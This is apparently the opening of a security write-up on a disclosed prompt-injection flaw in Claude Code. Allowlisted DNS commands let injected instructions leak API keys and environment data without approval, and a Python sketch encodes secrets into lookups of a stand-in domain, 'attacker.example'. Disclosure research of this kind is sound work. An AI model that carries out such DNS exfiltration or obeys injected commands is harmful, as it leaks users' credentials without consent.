A security researcher discovered a high-severity vulnerability in Claude Code that allowed attackers to hijack the AI assistant through prompt injection and exfiltrate sensitive data like API keys via DNS requests. The attack exploited allowlisted bash commands (ping, nslookup, dig, host) that didn't require user approval, enabling data extraction from local files and environment variables without consent. Anthropic quickly fixed the issue by removing these commands from the allowlist after responsible disclosure.
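The exfiltration channel works because DNS resolution itself carries data: anything placed in the hostname is sent to the authoritative nameserver for that domain. A minimal sketch of the encoding step, using a hypothetical attacker-controlled domain (`attacker.example`) and helper name for illustration:

```python
# Sketch of how data can be smuggled inside a DNS lookup (hypothetical
# attacker domain "attacker.example"): the secret is hex-encoded into
# subdomain labels, so merely resolving the name delivers it to the
# attacker's nameserver, with no HTTP request or file upload involved.
def dns_exfil_name(secret: str, domain: str = "attacker.example") -> str:
    encoded = secret.encode().hex()  # DNS labels are limited to [a-z0-9-]
    # Each DNS label is capped at 63 bytes, so longer secrets are chunked.
    labels = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
    return ".".join(labels + [domain])

# An injected prompt could then have the agent run an allowlisted command:
#   nslookup <result of dns_exfil_name("sk-...")>
print(dns_exfil_name("sk-test"))
```

Because `ping`, `nslookup`, `dig`, and `host` all trigger exactly this kind of resolution, any of the allowlisted commands sufficed as the final hop.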
Table of contents
- Prompt Injection Hijacks Claude
- Background and How It Was Discovered
- Building the Proof-of-Concept
- Prompt Injection Sources
- Recommended Mitigation
- Full Video Walkthrough
- Responsible Disclosure
- Conclusion
- References